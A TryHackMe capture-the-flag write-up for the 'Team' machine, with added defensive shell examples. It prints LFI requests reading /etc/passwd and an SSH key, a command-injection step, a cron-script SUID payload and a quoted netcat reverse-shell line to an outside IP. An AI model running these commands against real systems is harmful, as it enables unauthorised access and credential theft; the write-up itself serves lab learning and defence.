
TryHackMe - Team

 ·  ☕ 12 min read  ·  ✍️ sckull

Team is a TryHackMe machine. We found credentials in the FTP service that led us to a new subdomain, where we discovered an LFI and used it to enumerate files and find a private key for SSH access. We moved to the next user by abusing a bash script, and escalated privileges by editing a file used by a cron job.

Room

Title: Team
Description: Beginner friendly boot2root machine
Points: 60
Difficulty: Easy
Maker: dalemazza

NMAP

A port scan with nmap shows the FTP (21), SSH (22) and HTTP (80) ports open.

# Nmap 7.91 scan initiated Tue Mar 23 02:30:37 2021 as: nmap -p- --min-rate 10000 -oN allports 10.10.65.146
Nmap scan report for 10.10.65.146 (10.10.65.146)
Host is up (0.27s latency).
Not shown: 65532 filtered ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

# Nmap done at Tue Mar 23 02:31:41 2021 -- 1 IP address (1 host up) scanned in 63.96 seconds

# Nmap 7.91 scan initiated Tue Mar 23 02:32:33 2021 as: nmap -p 21,22,80 -sV -sC -oN serviceports 10.10.65.146
Nmap scan report for 10.10.65.146 (10.10.65.146)
Host is up (0.35s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 79:5f:11:6a:85:c2:08:24:30:6c:d4:88:74:1b:79:4d (RSA)
|   256 af:7e:3f:7e:b4:86:58:83:f1:f6:a2:54:a6:9b:ba:ad (ECDSA)
|_  256 26:25:b0:7b:dc:3f:b2:94:37:12:5d:cd:06:98:c7:9f (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works! If you see this add 'te...
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 23 02:32:51 2021 -- 1 IP address (1 host up) scanned in 18.06 seconds

HTTP

On the web page we find the domain team.thm.

HTTP/1.1 200 OK
Date: Tue, 23 Mar 2021 06:36:28 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sat, 16 Jan 2021 14:11:21 GMT
ETag: "2c66-5b90510390674"
Accept-Ranges: bytes
Content-Length: 11366
Vary: Accept-Encoding
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <!--
    Modified from the Debian original for Ubuntu
    Last updated: 2014-03-19
    See: https://launchpad.net/bugs/1288690
  -->
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>Apache2 Ubuntu Default Page: It works! If you see this add 'team.thm' to your hosts!</title>
    <style type="text/css" media="screen">
  * {
    margin: 0px 0px 0px 0px;
    padding: 0px 0px 0px 0px;
  } 

GOBUSTER

We enumerated the page on the domain we found and saw the /scripts/ and /assets/ folders, which we then enumerated recursively.

#team.thm
/assets (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/scripts (Status: 301)
/server-status (Status: 403)

#team.thm/assets/
/css (Status: 301)
/fonts (Status: 301)
/js (Status: 301)

#team.thm/scripts/
/script.txt (Status: 200)

We found a text file containing what appears to be a script for an FTP "server". It also contains a comment saying that the same file exists in this folder with a different extension, and that the old copy contains credentials.

┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://team.thm/scripts/script.txt
#!/bin/bash
read -p "Enter Username: " REDACTED
read -sp "Enter Username Password: " REDACTED
echo
ftp_server="localhost"
ftp_username="$Username"
ftp_password="$Password"
mkdir /home/username/linux/source_folder
source_folder="/home/username/source_folder/"
cp -avr config* $source_folder
dest_folder="/home/username/linux/dest_folder/"
ftp -in $ftp_server <<END_SCRIPT
quote USER $ftp_username
quote PASS $decrypt
cd $source_folder
!cd $dest_folder
mget -R *
quit

# Updated version of the script
# Note to self had to change the extension of the old "script" in this folder, as it has creds in

WFUZZ

We enumerated extensions with WFUZZ using a wordlist of file extensions.

┌──(kali㉿kali)-[~/thm/teamcw]
└─$ wfuzz -c -w fuzz.txt --sc 200 http://team.thm/scripts/script.FUZZ 
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://team.thm/scripts/script.FUZZ
Total requests: 4833

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                      
=====================================================================

000003247:   200        18 L     44 W       466 Ch   "old"

Total time: 0
Processed Requests: 4833
Filtered Requests: 4832
Requests/sec.: 0

We found the .old extension. In that file we found a username and password for the FTP service.

┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://team.thm/scripts/script.old          
#!/bin/bash
read -p "Enter Username: " ftpuser
read -sp "Enter Username Password: " T3@m$h@r3
echo
ftp_server="localhost"
ftp_username="$Username"
ftp_password="$Password"
mkdir /home/username/linux/source_folder
source_folder="/home/username/source_folder/"
cp -avr config* $source_folder
dest_folder="/home/username/linux/dest_folder/"
ftp -in $ftp_server <<END_SCRIPT
quote USER $ftp_username
quote PASS $decrypt
cd $source_folder
!cd $dest_folder
mget -R *
quit

FTP

We logged into the FTP service with the credentials found. There is a file containing a note for the user Dale, which says a PHP website is under development under the .dev subdomain, and that, per team policy, a copy of the id_rsa key should be placed in the relevant configuration file.

┌──(kali㉿kali)-[~/thm/teamcw]
└─$ cat New_site.txt 
Dale
        I have started coding a new website in PHP for the team to use, this is currently under development. It can be
found at ".dev" within our domain.

Also as per the team policy please make a copy of your "id_rsa" and place this in the relevent config file.

Gyles 

DEV DALE SITE - LFI

We added the subdomain dev.team.thm to our /etc/hosts file. On this subdomain we found a page containing a link.

┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/              
<html>
 <head>
  <title>UNDER DEVELOPMENT</title>
 </head>
 <body>
  Site is being built<a href=script.php?page=teamshare.php </a>
<p>Place holder link to team share</p>
 </body>
</html>

The linked page takes a value in the page parameter; after modifying that value we found that an LFI vulnerability exists.

┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/script.php?page=teamshare.php

<html>
 <head>
  <title>Team Share</title>
 </head>
 <body>
  Place holder for future team share </body>
</html>
                                                                                                                                                                                                                                                                                
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/script.php?page=index.php    

<html>
 <head>
  <title>UNDER DEVELOPMENT</title>
 </head>
 <body>
  Site is being built<a href=script.php?page=teamshare.php </a>
<p>Place holder link to team share</p>
 </body>
</html>
                                                                                                                                                                                                                                                                                
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/script.php?page=/etc/passwd | head 

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
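
The root cause of the LFI is that script.php passes the page parameter straight to an include. The PHP source is not on the page, so the following is an added shell model of the two checks a hardened version would perform (it is not the room's or the author's code): an allowlist of the pages the site actually ships, and a containment check that resolves the candidate path and refuses anything that lands outside the document root. The fixture directory created by make_webroot stands in for /var/www/dev.team.thm and is an assumption.

```shell
#!/bin/sh
# Added example, not from the original writeup: models how the "page" parameter
# of dev.team.thm/script.php should be validated before a file is included.
# The real handler is PHP; this shell version shows the same two checks.

# Check 1: allowlist. Only names the site actually ships are accepted, so
# "/etc/passwd" or "../../etc/passwd" never reach the filesystem at all.
page_allowed() {
    case "$1" in
        index.php|teamshare.php) return 0 ;;
        *) return 1 ;;
    esac
}

# Check 2: containment. For sites that must map user input to a path, resolve
# the candidate (following symlinks and "..") and accept it only if it stays
# under the document root and names a regular file. Prints the resolved path.
confine_path() {
    root="$1"; candidate="$2"
    root_abs=$(cd "$root" 2>/dev/null && pwd -P) || return 1
    # cd from the root so relative input is resolved relative to the root,
    # then let pwd -P give the physical directory (symlinks resolved).
    dir=$(cd "$root_abs" && cd "$(dirname "$candidate")" 2>/dev/null && pwd -P) || return 1
    file="$dir/$(basename "$candidate")"
    case "$file" in
        "$root_abs"/*) ;;
        *) return 1 ;;
    esac
    [ -f "$file" ] || return 1
    printf '%s\n' "$file"
}

# Combined gate: what a hardened script.php would do with ?page=...
resolve_page() {
    root="$1"; page="$2"
    page_allowed "$page" || return 1
    confine_path "$root" "$page"
}

# Constructed fixture standing in for /var/www/dev.team.thm (assumption).
make_webroot() {
    d=$(mktemp -d)
    : > "$d/index.php"
    : > "$d/teamshare.php"
    printf '%s\n' "$d"
}
```

The allowlist alone is enough for a site with two fixed pages; confine_path is the general form for handlers that genuinely need to build paths from input, and it is the check that turns /etc/passwd and ../../../../etc/passwd into rejections rather than file reads.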

We enumerated the users that have a home directory, which let us obtain our user.txt flag.

┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/script.php?page=/etc/passwd |grep "/home"
                                               
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
dale:x:1000:1000:anon,,,:/home/dale:/bin/bash
gyles:x:1001:1001::/home/gyles:/bin/bash
ftpuser:x:1002:1002::/home/ftpuser:/bin/sh

┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/script.php?page=/home/dale/user.txt       

THM{[...REDACTED...]}

DALE - USER

After a failed attempt to read the private keys of the existing users, we used a wordlist with WFUZZ to enumerate files that could help us gain access to the machine. We obtained a list of readable files and, from them, information about the machine. Reading each file, we found the private key of the user Dale inside /etc/ssh/sshd_config.

┌──(kali㉿kali)-[~/thm/teamcw]
└─$ wfuzz -c -w lfi_paths.txt --hh 1 http://dev.team.thm/script.php?page=FUZZ 
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://dev.team.thm/script.php?page=FUZZ
Total requests: 1014

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                      
=====================================================================

000000015:   200        230 L    1119 W     7313 Ch     "/etc/apache2/apache2.conf"
[... REDACTED ...]
000000162:   200        13 L     17 W       383 Ch      "/etc/os-release"                                                                                                            
000000164:   200        16 L     59 W       553 Ch      "/etc/pam.conf"                                                                                                              
000000197:   200        19 L     113 W      736 Ch      "/etc/resolv.conf"                                                                                                           
000000184:   200        28 L     97 W       582 Ch      "/etc/profile"                                                                                                               
000000165:   200        34 L     42 W       1698 Ch     "/etc/passwd"                                                                                                                
000000166:   200        34 L     42 W       1696 Ch     "/etc/passwd-"                                                                                                               
000000219:   200        12 L     70 W       420 Ch      "/etc/security/sepermit.conf"                                                                                                
000000220:   200        66 L     412 W      2180 Ch     "/etc/security/time.conf"                                                                                                    
000000216:   200        74 L     499 W      2973 Ch     "/etc/security/pam_env.conf"                                                                                                 
000000214:   200        29 L     217 W      1441 Ch     "/etc/security/namespace.conf"                                                                                               
000000213:   200        57 L     347 W      2151 Ch     "/etc/security/limits.conf"                                                                                                  
000000210:   200        107 L    663 W      3636 Ch     "/etc/security/group.conf"                                                                                                   
000000206:   200        123 L    802 W      4621 Ch     "/etc/security/access.conf"                                                                                                  
000000260:   200        160 L    955 W      5937 Ch     "/etc/vsftpd.conf"                                                                                                           
000000252:   200        5 L      45 W       404 Ch      "/etc/updatedb.conf"                                                                                                         
000000248:   200        2 L      1 W        15 Ch       "/etc/timezone"                                                                                                              
000000246:   200        78 L     339 W      2684 Ch     "/etc/sysctl.conf"                                                                                                           
000000240:   200        169 L    447 W      5990 Ch     "/etc/ssh/sshd_config"                                                                                                       
000000379:   200        59 L     114 W      538 Ch      "/proc/devices"                                                                                                              
[... REDACTED ...]
000000630:   200        89 L     467 W      3029 Ch     "/usr/share/adduser/adduser.conf"                                                                                            

Total time: 0
Processed Requests: 1014
Filtered Requests: 933
Requests/sec.: 0

Using the private key we obtained a shell as the user Dale.

┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/script.php?page=/etc/ssh/sshd_config

[... REDACTED ..]

----BEGIN OPENSSH PRIVATE KEY-----
#b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
#NhAAAAAwEAAQAAAYEAng6KMTH3zm+6rqeQzn5HLBjgruB9k2rX/XdzCr6jvdFLJ+uH4ZVE
[.. REDACTED ..]                                              
#CPFMeoYeUdghftAAAAE3A0aW50LXA0cnJvdEBwYXJyb3QBAgMEBQYH                                                                
#-----END OPENSSH PRIVATE KEY-----

┌──(kali㉿kali)-[~/thm/teamcw]
└─$ ssh -i dale_id_rsa dale@10.10.151.176                                                                                                                                               130 ⨯
Last login: Mon Jan 18 10:51:32 2021
dale@TEAM:~$ whoami; id; pwd
dale
uid=1000(dale) gid=1000(dale) groups=1000(dale),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare),1003(editors)
/home/dale
dale@TEAM:~$

GYLES - USER

A quick enumeration shows that the current user can run the script admin_checks through sudo (as the user gyles, with no password required), and also has read permission on it.

dale@TEAM:~$ sudo -l -l
Matching Defaults entries for dale on TEAM:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dale may run the following commands on TEAM:

Sudoers entry:
    RunAsUsers: gyles
    Options: !authenticate
    Commands:
        /home/gyles/admin_checks
dale@TEAM:~$ ls -lah /home/gyles/admin_checks
-rwxr--r-- 1 gyles editors 399 Jan 15 21:52 /home/gyles/admin_checks
dale@TEAM:~$ groups
dale adm cdrom sudo dip plugdev lxd lpadmin sambashare editors

The script runs the date command only if that is what gets typed at the prompt, in which case it prints the date; it then creates a backup file named with the date.

dale@TEAM:~$ cat /home/gyles/admin_checks
#!/bin/bash

printf "Reading stats.\n"
sleep 1
printf "Reading stats..\n"
sleep 1
read -p "Enter name of person backing up the data: " name
echo $name  >> /var/stats/stats.txt
read -p "Enter 'date' to timestamp the file: " error # Asks for date
printf "The Date is "
$error 2>/dev/null # Runs date

date_save=$(date "+%F-%H-%M")
cp /var/stats/stats.txt /var/stats/stats-$date_save.bak

printf "Stats have been backed up\n"

To take advantage of this we pass /bin/bash instead of date, which gives us a shell as the user gyles.

dale@TEAM:~$ sudo -u gyles /home/gyles/admin_checks
Reading stats.
Reading stats..
Enter name of person backing up the data: batman
Enter 'date' to timestamp the file: /bin/bash
The Date is 
whoami;id
gyles
uid=1001(gyles) gid=1001(gyles) groups=1001(gyles),1003(editors),1004(admin)
which python
which python3
/usr/bin/python3
python3 -c 'import pty; pty.spawn("/bin/bash");'
gyles@TEAM:~$ pwd
/home/dale
gyles@TEAM:~$ cd /home
gyles@TEAM:/home$ cd gyles
gyles@TEAM:/home/gyles$ ls -lah
total 48K
drwxr-xr-x 6 gyles gyles   4.0K Jan 17 19:47 .
drwxr-xr-x 5 root  root    4.0K Jan 15 20:21 ..
-rwxr--r-- 1 gyles editors  399 Jan 15 21:52 admin_checks
-rw------- 1 gyles gyles   5.6K Jan 17 20:34 .bash_history
-rw-r--r-- 1 gyles gyles    220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 gyles gyles   3.7K Apr  4  2018 .bashrc
drwx------ 2 gyles gyles   4.0K Jan 15 21:38 .cache
drwx------ 3 gyles gyles   4.0K Jan 15 21:38 .gnupg
drwxrwxr-x 3 gyles gyles   4.0K Jan 15 21:51 .local
-rw-r--r-- 1 gyles gyles    807 Apr  4  2018 .profile
drwx------ 2 gyles gyles   4.0K Jan 15 21:43 .ssh
-rw-r--r-- 1 gyles gyles      0 Jan 17 15:05 .sudo_as_admin_successful
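
The weak line in admin_checks is `$error 2>/dev/null`: whatever is typed at the prompt is executed as a command, so the prompt is a command-injection point, and the sudoers entry exposes it to dale as gyles without a password. The following is an added hardened rewrite of that step (not the room's or the author's script): the answer is compared against the literal word date and anything else is rejected, the name is stored verbatim instead of being expanded, and the stats path is a parameter so the function can run anywhere. The STATS_FILE argument replacing /var/stats/stats.txt is an assumption.

```shell
#!/bin/sh
# Added example, not from the original writeup: a hardened rewrite of the
# "date" step in /home/gyles/admin_checks. The original runs the user's answer
# as a command; this version only ever runs date itself.

# timestamp_line ANSWER: print the date only if ANSWER is the literal word
# "date"; otherwise refuse and return 1. Nothing typed by the user is executed.
timestamp_line() {
    if [ "$1" = "date" ]; then
        printf 'The Date is %s\n' "$(date "+%F-%H-%M")"
    else
        printf 'admin_checks: expected "date", got "%s"; aborting\n' "$1" >&2
        return 1
    fi
}

# admin_checks_hardened STATS_FILE: same flow as the original script (name,
# then the date prompt, then a dated backup), reading answers from stdin.
# STATS_FILE replaces the hard-coded /var/stats/stats.txt (assumption).
admin_checks_hardened() {
    stats="$1"
    printf 'Enter name of person backing up the data: '
    IFS= read -r name || return 1
    # Quoted and read with -r so the name is stored verbatim, never expanded
    # or re-interpreted by the shell.
    printf '%s\n' "$name" >> "$stats"
    printf "Enter 'date' to timestamp the file: "
    IFS= read -r answer || return 1
    timestamp_line "$answer" || return 1
    date_save=$(date "+%F-%H-%M")
    cp "$stats" "$stats-$date_save.bak"
    printf 'Stats have been backed up\n'
}
```

Even with the prompt fixed, a script reachable through a NOPASSWD sudo rule should be owned by root, not writable by the caller, and should not accept free-form input at all if a fixed command sequence will do.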

PRIVILEGE ESCALATION

We did some enumeration as the user Gyles and found in the .bash_history file that several scripts had been edited and reverse shells run. Apparently some of those files are used to restore the files of the team.thm and dev.team.thm sites.

gyles@TEAM:/home/gyles$ cat .bash_history|grep ".sh"
cat /etc/shells
chsh -s /bin/bash
nc 192.168.88.128 -e /bin/bash
nc 192.168.88.128 < /bin/bash

[ .. REDACTED ..]

cat /usr/local/sbin/dev.backup.sh 
cat /usr/local/bin/main_backup.sh
cat /opt/admin_stuff/script.sh 
nano /usr/local/sbin/dev.backup.sh
sudo nano /usr/local/sbin/dev.backup.sh
sudo nano /opt/admin_stuff/script.sh 
diff /usr/local/sbin/dev_backup.sh /usr/local/bin/main_backup.sh 
sudo chmod +x dev_backup.sh 
sudo rm dev.backup.sh 
nano dev_backup.sh 
nano /usr/local/bin/main_backup.sh 

We ran pspy to check whether a cron job runs these scripts. We observe that several scripts are executed: /opt/admin_stuff/script.sh, /usr/local/sbin/dev_backup.sh and /usr/local/bin/main_backup.sh.

2021/03/23 08:43:01 CMD: UID=0    PID=1569   | /bin/bash /opt/admin_stuff/script.sh 
2021/03/23 08:43:01 CMD: UID=0    PID=1568   | /bin/bash /opt/admin_stuff/script.sh 
2021/03/23 08:43:01 CMD: UID=0    PID=1567   | /usr/sbin/CRON -f 
2021/03/23 08:43:01 CMD: UID=0    PID=1570   | cp -r /var/www/team.thm/assets /var/www/team.thm/images /var/www/team.thm/index.html /var/www/team.thm/robots.txt /var/www/team.thm/scripts /var/backups/www/team.thm/ 
2021/03/23 08:43:01 CMD: UID=0    PID=1571   | /bin/bash /usr/local/sbin/dev_backup.sh 
2021/03/23 08:43:01 CMD: UID=0    PID=1572   | cp -r /var/www/dev.team.thm/index.php /var/www/dev.team.thm/script.php /var/www/dev.team.thm/teamshare.php /var/backups/www/dev/ 
2021/03/23 08:43:48 CMD: UID=0    PID=1573   | ps -e -o pid,ppid,state,command 
2021/03/23 08:44:01 CMD: UID=0    PID=1576   | /bin/bash /usr/local/bin/main_backup.sh 
2021/03/23 08:44:01 CMD: UID=0    PID=1575   | /bin/bash /opt/admin_stuff/script.sh 
2021/03/23 08:44:01 CMD: UID=0    PID=1574   | /usr/sbin/CRON -f 
2021/03/23 08:44:01 CMD: UID=0    PID=1577   | cp -r /var/www/team.thm/assets /var/www/team.thm/images /var/www/team.thm/index.html /var/www/team.thm/robots.txt /var/www/team.thm/scripts /var/backups/www/team.thm/ 

Checking the permissions of the scripts, we see that we have read, write and execute permissions on the file /usr/local/bin/main_backup.sh.

gyles@TEAM:/home/gyles$ ls -lah /opt/admin_stuff/script.sh
-rwxr--r-- 1 root root 200 Jan 17 20:38 /opt/admin_stuff/script.sh
gyles@TEAM:/home/gyles$ ls -lah /usr/local/sbin/dev_backup.sh
-rwxr-xr-x 1 root root 64 Jan 17 19:42 /usr/local/sbin/dev_backup.sh
gyles@TEAM:/home/gyles$ ls -lah /usr/local/bin/main_backup.sh
-rwxrwxr-x 1 root admin 65 Jan 17 20:36 /usr/local/bin/main_backup.sh
gyles@TEAM:/home/gyles$ id
uid=1001(gyles) gid=1001(gyles) groups=1001(gyles),1003(editors),1004(admin)
gyles@TEAM:/home/gyles$

We append a command that gives bash the SUID bit.

echo "chmod u+s /bin/bash" >> /usr/local/bin/main_backup.sh

We wait for the cron job to run; after a few seconds bash has the SUID bit set.

gyles@TEAM:/home/gyles$ ls -lah /bin/bash
-rwxr-xr-x 1 root root 1.1M Apr  4  2018 /bin/bash
gyles@TEAM:/home/gyles$ echo "chmod u+s /bin/bash" >> /usr/local/bin/main_backup.sh
gyles@TEAM:/home/gyles$ ls -lah /bin/bash
-rwsr-xr-x 1 root root 1.1M Apr  4  2018 /bin/bash

We run bash -p, which gives us a root shell and our root.txt flag.

gyles@TEAM:/home/gyles$ bash -p
bash-4.4# whoami
root
bash-4.4# cd
bash-4.4# whoami; id; pwd
root
uid=1001(gyles) gid=1001(gyles) euid=0(root) groups=1001(gyles),1003(editors),1004(admin)
/home/dale
bash-4.4# cd /root
bash-4.4# ls 
root.txt
bash-4.4# cat root.txt
THM{[... REDACTED ...]}
bash-4.4#
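
The escalation works because a script that root's cron executes (main_backup.sh) is group-writable, and gyles is in that group. The check below is an added example (not the room's or the author's code) that flags exactly that condition: it reads each script's mode string and reports any that is writable by group or others, regardless of owner, so it can run periodically and alert. It runs over a constructed directory that mirrors the three modes from the ls output above (744, 755 and the offending 775); the real paths are not touched.

```shell
#!/bin/sh
# Added example, not from the original writeup: flag scripts that a privileged
# scheduler (root's cron here) executes but that non-root users can modify.

# writable_by_others FILE: succeed if the file's mode grants write to group or
# to others. Parses the ls -l mode string (positions 6 and 9), so it works
# without GNU find -perm.
writable_by_others() {
    mode=$(ls -ld "$1" | cut -c1-10)
    case "$mode" in
        ?????w*|????????w*) return 0 ;;
        *) return 1 ;;
    esac
}

# audit_cron_scripts FILE...: print each script that fails the check, one per
# line, as "<mode> <path>". Returns 0 if at least one was found (so a
# monitoring job can alert on success) and 1 otherwise.
audit_cron_scripts() {
    found=1
    for f in "$@"; do
        [ -f "$f" ] || continue
        if writable_by_others "$f"; then
            printf '%s %s\n' "$(ls -ld "$f" | cut -c1-10)" "$f"
            found=0
        fi
    done
    return $found
}

# Constructed fixture mirroring the modes shown in the writeup's ls output
# (not the real machine): 744, 755 and the offending 775.
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/opt/admin_stuff" "$d/usr/local/sbin" "$d/usr/local/bin"
    : > "$d/opt/admin_stuff/script.sh";    chmod 744 "$d/opt/admin_stuff/script.sh"
    : > "$d/usr/local/sbin/dev_backup.sh"; chmod 755 "$d/usr/local/sbin/dev_backup.sh"
    : > "$d/usr/local/bin/main_backup.sh"; chmod 775 "$d/usr/local/bin/main_backup.sh"
    printf '%s\n' "$d"
}
```

On a real host the argument list would come from the crontab entries and /etc/cron.* rather than a fixture; the same ownership question applies to every script they reference and to the directories those scripts live in.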
Written by sckull, Pentester wannabe